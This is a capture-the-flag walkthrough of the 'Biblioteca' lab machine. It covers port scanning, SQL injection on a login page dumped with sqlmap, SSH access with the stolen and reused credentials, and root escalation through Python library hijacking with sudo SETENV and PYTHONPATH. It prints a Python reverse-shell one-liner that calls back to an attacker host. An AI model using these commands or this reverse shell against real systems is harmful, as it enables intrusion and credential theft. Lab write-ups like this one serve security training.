# Biblioteca

## Nmap

```
sudo nmap 10.10.198.83 -p- -sS -sV       

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting out we hit port 8000 which is running `werkzeug`. Looking up the version number on `searchsploit` shows no exploits available.

The root page of the web server shows us a login page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNnEJVCBRam3dQXIaUpWA%2Fimage.png?alt=media\&token=fc739c56-b339-4a91-a632-d3b475a28869)

Using the link at the bottom of the page we move over to a registration form. Signing up with an account is successful.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCFvHCXuFakROR2mjXkzr%2Fimage.png?alt=media\&token=9674c231-79e5-4342-bbc7-dacda9cdb4b2)

We are then able to login with our newly created account.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F6Qz2Z5AeGsIdiVud7lKa%2Fimage.png?alt=media\&token=ed342f0e-dbe8-4845-aa40-3fac5088c213)

However, from here I was unable to enumerate further files or directories. After running exhaustive searches I then started ZAP Proxy. Using the active scan feature, ZAP flags a SQL injection on the web server login page.

Firstly we save the login request in ZAP to the attacking computer.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIPA1PYANY4Mt2ojm0RkW%2Fimage.png?alt=media\&token=28c14f74-3abf-49a5-b0bd-4048c81ca1f6)

Then use it in conjunction with `sqlmap` as shown below.

```bash
sqlmap -r request.raw --batch -D website -T users --dump
```

Building the right command to dump the users table of the website database we see stored credentials for the user smokey.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F05jfpAvHmwMwGDPS4muM%2Fimage.png?alt=media\&token=71d9574e-6eb2-4a23-8d99-5bf7533a081f)

Where, we are able to login over SSH with the found credentials.

```bash
ssh smokey@<IP>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwPfTUOYfzTT8rCPLWADf%2Fimage.png?alt=media\&token=7b58d63b-4a0f-4d51-80e1-13d26a1ffbd2)

Viewing the home directories we notice the presence of the user *hazel*. We also find we are able to `su` over to hazel using her username as the password. We are also able to also login over `SSH` with the same credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F84rZOeg966iKs5FvofiN%2Fimage.png?alt=media\&token=3b004677-002e-42f1-9584-38f9eb9dc9b8)

Checking `sudo -l` we notice that we are able to run `/home/hazel/hasher.py` with the python3 binary as root, without specifying a password. Interestingly, the value `SETENV:` also dictates that we are able to change the `PYTHONPATH` environmental variable.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2TWIZ2bp5pGkWHY3j1zd%2Fimage.png?alt=media\&token=16dbe38d-5bb5-413e-93a3-0ba50ed2a054)

The exploit method here is known as :thumbsup::thumbsup:python library hijacking". I have linked a well written article below, which serves as a basis for the exploit bath on this page.

**URL** <https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8>

Essentially, `SETENV:` allows us to change the environmental path for where python searches for modules.

Reading the contents of `hasher.py` we see the script imports the module hashlib. We can create a python reverse shell called `hashlib.py` in the `/tmp` directory. After doing so, we can run the sudo command and set where the PYTHONPATH looks first when attempt to load external modules references in `hasher.py`, this should execute our reverse shell.

Create a new `hashlib.py` file in `/tmp` with the following contents.

```python
import os
os.system("whoami")
```

Then test

```
sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNgdRhebCXOkXWR7yyLZx%2Fimage.png?alt=media\&token=3bb0ffbd-dd16-4edf-8fd4-2175cece8fec)

With confirmed root execution we then replace the contents of `/tmp/hashlib.py` with a python3 reverse shell and catch on our attacking system with a `netcat` listener.

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBZwyYhrnYnbxalHQMl33%2Fimage.png?alt=media\&token=dbfc782a-b22c-4883-b3db-2ad2eae21c46)